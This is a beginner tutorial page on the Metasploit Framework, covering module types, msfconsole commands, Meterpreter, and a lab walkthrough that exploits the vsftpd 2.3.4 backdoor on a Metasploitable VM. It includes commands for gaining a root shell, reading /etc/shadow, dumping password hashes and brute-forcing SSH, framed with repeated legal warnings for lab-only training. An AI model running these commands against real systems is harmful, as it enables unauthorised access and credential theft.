Metasploit Framework: Penetration Testing for Beginners

Legal and Ethical Notice

Only use Metasploit against systems you own or have explicit written permission to test. Running exploits against unauthorised targets is a criminal offence in most jurisdictions — including under Australia’s Criminal Code Act 1995 (Part 10.7) and the Computer Fraud and Abuse Act (CFAA) in the United States. Every command on this page assumes you are working in your own home lab or an authorised practice environment.

Even in a professional penetration testing engagement, exploiting systems requires a signed scope agreement (Rules of Engagement) before you touch a single target. Treat this as a non-negotiable rule from day one.

What Is Metasploit and Why Does It Matter?

Metasploit Framework is the world’s most widely used open-source penetration testing platform, maintained by Rapid7. According to Rapid7’s official documentation, it contains over 2,300 verified exploits and 3,500+ modules for security testing. NIST SP 800-115 references exploitation frameworks as essential tools for technical security assessment.

Metasploit Framework is a free, open-source penetration testing platform that provides the infrastructure for developing, testing, and executing exploit code against remote targets. Originally created by HD Moore in 2003 and now maintained by Rapid7, it has become the de facto standard for penetration testers, security researchers, and red team operators.

Think of Metasploit as a structured workshop for penetration testing. Instead of writing exploits from scratch, you select pre-built modules, configure them for your target, and execute them in a controlled, repeatable way. It handles the complex low-level details — shellcode generation, payload encoding, session management — so you can focus on understanding the vulnerability and its impact.

I will be completely honest — the first time I ran an exploit in Metasploit and got a Meterpreter shell on my Metasploitable VM, I felt equal parts excited and terrified. Excited because I had just done something that would have seemed like movie hacking six months ago. Terrified because it was so easy. Three commands and I had complete control of a remote system. That is when I truly understood why patching matters, why vulnerability management exists, and why organisations spend millions on security. If a career changer studying in her Sydney flat can do this with a free tool, imagine what a motivated attacker can do.

Quick Answer

What is Metasploit? Metasploit Framework is a free, open-source penetration testing platform with over 2,300 exploits for discovering and validating security vulnerabilities. Why it matters for beginners: Metasploit is tested on CompTIA PenTest+ (PT0-002) and is the primary tool in the OffSec OSCP certification. Understanding it is essential for offensive security careers. Key framework: NIST SP 800-115 (Technical Guide to Information Security Testing and Assessment) includes exploitation as a core component of technical security testing.

How Is Metasploit Structured?

Metasploit’s architecture is modular. Everything is organised into categories that serve specific purposes in the penetration testing workflow.

Module Types

Module Type	Purpose	Example
Exploits	Code that takes advantage of a specific vulnerability	exploit/unix/ftp/vsftpd_234_backdoor
Payloads	Code that runs on the target after successful exploitation	windows/meterpreter/reverse_tcp
Auxiliary	Scanning, fuzzing, and information gathering tools	auxiliary/scanner/portscan/tcp
Post	Post-exploitation modules for pivoting, privilege escalation, and data gathering	post/windows/gather/hashdump
Encoders	Obfuscate payloads to evade detection	x86/shikata_ga_nai
Nops	Generate no-operation instructions for padding	Used internally by exploit modules

Key Definition

Exploit — Code that takes advantage of a specific software vulnerability to gain unauthorised access or execute commands on a target system. Payload — Code that executes on the target system after a successful exploit, providing the attacker with capabilities such as a command shell or remote control. Source: NIST SP 800-115, Section 5.

Framework vs Pro vs Community

Feature	Framework (Free)	Community (Free, Limited)	Pro (~$15,000/year)
Exploits and modules	Full access	Full access	Full access
Command line (msfconsole)	Yes	Yes	Yes
Web interface	No	Basic	Full
Automated exploitation	Manual	Limited	Full
Reporting	Manual	Basic	Professional reports
Social engineering	Manual	No	Integrated

For learning, Metasploit Framework is all you need. It comes pre-installed on Kali Linux and is the version used in the OSCP exam and most training courses.

Metasploit Penetration Testing Workflow

The five stages of using Metasploit in a security assessment

Pause

Reconnaissance

Stage 1

Nmap scan for open ports

Identify services and versions

Import results into Metasploit

Select Exploit

Stage 2

Search for matching exploits

Review exploit details and reliability

Set target and options

Configure Payload

Stage 3

Choose payload type

Set LHOST and LPORT

Configure encoding if needed

Exploit

Stage 4

Execute the exploit

Obtain shell or meterpreter

Verify access level

Post-Exploitation

Stage 5

Gather system information

Escalate privileges

Document findings for report

Idle

How Do You Use msfconsole?

msfconsole is the primary command-line interface for Metasploit Framework. It is where you will spend most of your time.

Starting Metasploit

# On Kali Linux, Metasploit is pre-installed
# Start the database first (for storing scan results)
sudo msfdb init
# Launch msfconsole
msfconsole

The first launch may take a minute while it loads all modules. You will see the Metasploit banner and the msf6 > prompt.

Essential Commands

# Search for exploits by keyword
msf6 > search vsftpd
msf6 > search type:exploit platform:windows smb

# Get information about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

# Select a module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# Show required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

# Set target IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101

# Set your attacking machine IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LHOST 192.168.56.1

# Run the exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Key Options You Will Set

Option	Meaning	Example
RHOSTS	Remote host — the target IP address	192.168.56.101
RPORT	Remote port — the target port	21 (usually set automatically)
LHOST	Local host — your attacking machine IP	192.168.56.1
LPORT	Local port — port on your machine for the reverse connection	4444 (default)
PAYLOAD	The code to run on the target after exploitation	cmd/unix/interact

What Is Meterpreter?

Meterpreter is Metasploit’s most powerful payload — an advanced, dynamically extensible shell that runs entirely in memory on the target system. According to Rapid7’s documentation, Meterpreter provides capabilities including file system access, process manipulation, network pivoting, screenshot capture, and keylogging.

Meterpreter is not just a command prompt. It is a full-featured post-exploitation platform:

# Once you have a Meterpreter session:
meterpreter > sysinfo              # System information
meterpreter > getuid               # Current user context
meterpreter > pwd                  # Current directory on target
meterpreter > ls                   # List files
meterpreter > download secret.txt  # Download files from target
meterpreter > upload tool.exe      # Upload files to target
meterpreter > hashdump             # Dump password hashes (requires SYSTEM)
meterpreter > screenshot           # Capture screenshot
meterpreter > shell                # Drop to a standard system shell
meterpreter > background           # Background the session

Why Meterpreter matters for learning: It shows you exactly what an attacker can do after gaining access. Every command you run in Meterpreter represents a real post-exploitation technique. Understanding these capabilities helps you appreciate why prevention, detection, and incident response all matter.

Step-by-Step: Your First Exploit (Metasploitable)

This walkthrough uses the Metasploitable 2 VM — a deliberately vulnerable Linux image maintained by Rapid7 for training purposes. It should only be run in an isolated home lab environment.

Legal Warning

These commands exploit a known vulnerability. Only run them against your own Metasploitable VM in an isolated virtual network. Running exploits against any system without explicit written authorisation is illegal.

Step 1: Scan the Target with Nmap

# From your Kali VM
nmap -sV 192.168.56.101

You will see vsftpd 2.3.4 on port 21. This version has a well-known backdoor vulnerability (CVE-2011-2523).

Step 2: Search for the Exploit

msf6 > search vsftpd

# Output:
# exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03  excellent

Step 3: Configure and Run the Exploit

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

# Output:
# [*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
# [*] 192.168.56.101:21 - USER: 331 Please specify the password.
# [+] 192.168.56.101:21 - Backdoor service has been spawned
# [+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
# [*] Command shell session 1 opened

Step 4: Explore the Compromised System

# You now have a root shell on the target
whoami
# root
hostname
# metasploitable
cat /etc/shadow
# (password hashes visible — demonstrates the severity of root access)

Step 5: Document and Clean Up

In a real assessment, you would document:

• The vulnerability exploited (vsftpd 2.3.4 backdoor, CVE-2011-2523)
• The level of access obtained (root)
• Evidence (screenshots, command output)
• Remediation recommendation (upgrade vsftpd, remove backdoored version)

Then exit cleanly and end the session.

What Are Common Auxiliary Modules?

Auxiliary modules handle tasks beyond exploitation — scanning, enumeration, and information gathering.

# Port scanning
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.56.0/24
msf6 auxiliary(scanner/portscan/tcp) > run

# SMB version detection
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.56.101
msf6 auxiliary(scanner/smb/smb_version) > run

# SSH brute force (against your own lab only!)
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.101
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run

Importing Nmap Results

Metasploit integrates directly with Nmap. You can import scan results to avoid rescanning:

# Run Nmap from within msfconsole
msf6 > db_nmap -sV -sC 192.168.56.101

# Or import a saved Nmap XML file
msf6 > db_import /path/to/scan.xml

# View discovered hosts and services
msf6 > hosts
msf6 > services
msf6 > vulns

Metasploit is tested on PenTest+ and used extensively in the OSCP exam. The study tracker helps you map each module type to lab exercises so you build hands-on experience systematically.

Career Roadmap & Study TrackerAvailable Now

Step-by-step roadmap with study tracker worksheets and certification decision framework.

Get the Guide → $27

What Are the Limitations and Ethical Boundaries?

Metasploit is an exploitation tool. Its entire purpose is to compromise systems. This power comes with serious ethical and legal responsibilities.

Legal boundaries are absolute. Running any exploit module against a system without explicit written authorisation is a criminal offence. In Australia, the Criminal Code Act 1995 carries penalties of up to 10 years imprisonment for unauthorised access to computer systems. Similar laws exist in every jurisdiction worldwide.

Metasploit is not a vulnerability scanner. It exploits known vulnerabilities rather than discovering new ones. Use Nmap and vulnerability scanners (Nessus, OpenVAS) for discovery, then use Metasploit to validate that vulnerabilities are actually exploitable.

Antivirus and EDR will detect Metasploit payloads. Default Metasploit payloads are well-known to security products. In real engagements, testers use custom payloads and evasion techniques. For lab practice, this is not a concern.

Not all exploits are reliable. Module reliability ratings (excellent, great, good, normal, low, manual) indicate how likely the exploit is to work without crashing the target. In a real assessment, crashing a production system is a serious incident. Always check the reliability rating.

Summary and Key Takeaways

• Metasploit Framework is the industry-standard open-source penetration testing platform — free, pre-installed on Kali Linux, and used by professional penetration testers worldwide.
• The framework is modular — exploits, payloads, auxiliary modules, and post-exploitation tools each serve a specific purpose in the testing workflow.
• msfconsole is the primary interface. Learn the core commands: search, use, set, show options, and exploit.
• Meterpreter is the most powerful payload — providing full post-exploitation capabilities including file access, process control, and privilege escalation.
• Legal authorisation is non-negotiable. Only use Metasploit against systems you own or have explicit written permission to test.
• Start with Metasploitable in your home lab. It is specifically designed for learning Metasploit safely.
• Metasploit validates vulnerabilities — it does not discover them. Pair it with Nmap and vulnerability scanners for a complete assessment workflow.

---

Legal reminder: Exploiting systems without authorisation is a criminal offence in most jurisdictions. All commands on this page assume you are working in your own home lab or an authorised practice environment.

---

Technical details verified in March 2026 against Rapid7’s official Metasploit documentation (docs.metasploit.com), NIST SP 800-115, and CompTIA PenTest+ PT0-002 exam objectives.

Frequently Asked Questions

Is Metasploit legal to use?

Metasploit Framework itself is legal to download, install, and use. However, running exploits against systems you do not own or do not have explicit written authorisation to test is illegal in most jurisdictions. In Australia, unauthorised access carries penalties under the Criminal Code Act 1995. Always test only in your own lab or with written permission.

Is Metasploit free?

Metasploit Framework is free and open-source. It comes pre-installed on Kali Linux. Rapid7 also offers Metasploit Pro (approximately $15,000/year) with additional automation, reporting, and web interface features. For learning, the free Framework is all you need.

What is the difference between an exploit and a payload?

An exploit is code that takes advantage of a specific vulnerability to gain access to a target system. A payload is code that runs on the target after the exploit succeeds, giving you capabilities like a command shell or Meterpreter session. You choose both when configuring an attack in Metasploit.

What is Meterpreter?

Meterpreter is Metasploit's most advanced payload — an extensible shell that runs in memory on the target system. It provides capabilities including file system access, process control, screenshot capture, password hash dumping, and network pivoting, all without writing files to disk on the target.

Do I need to know programming to use Metasploit?

No programming knowledge is needed to use existing Metasploit modules. You interact through msfconsole using simple commands like search, use, set, and exploit. However, understanding Python and Ruby becomes valuable if you want to write custom modules or modify existing ones.

What certifications test Metasploit knowledge?

CompTIA PenTest+ (PT0-002) covers exploitation frameworks including Metasploit. The OffSec OSCP certification relies heavily on Metasploit skills (with a limit of one use during the exam). CEH (Certified Ethical Hacker) also covers Metasploit as a core tool.

What is the best practice target for Metasploit?

Metasploitable 2, maintained by Rapid7, is the most widely recommended practice target. It is a deliberately vulnerable Linux VM with dozens of exploitable services. Run it in VirtualBox on an isolated host-only network alongside Kali Linux.

Can antivirus detect Metasploit payloads?

Yes, most modern antivirus and endpoint detection and response (EDR) solutions detect default Metasploit payloads. The payloads are well-known and signatured. In professional engagements, testers use custom payloads and evasion techniques. For lab practice, this is not a concern since Metasploitable has no AV installed.

Related sections

Nmap Tutorial for Beginners

Network scanning is the first step before exploitation — discover targets and services with Nmap before using Metasploit.

Explore Burp Suite Guide

Web application testing complements network exploitation — test web vulnerabilities alongside infrastructure flaws.

Explore Home Lab Setup

Build the isolated virtual lab environment where you can safely practise Metasploit against vulnerable targets.

Explore

More resources

Metasploit Official Documentation

Complete reference for Metasploit Framework modules, commands, and workflow from Rapid7.

Visit Metasploit Unleashed (OffSec)

Free comprehensive Metasploit course from Offensive Security covering beginner to advanced topics.

Visit Metasploitable Download

Download the intentionally vulnerable Metasploitable 2 VM for safe practice in your home lab.

Visit NIST SP 800-115

NIST Technical Guide to Information Security Testing and Assessment — the framework for professional penetration testing.

Visit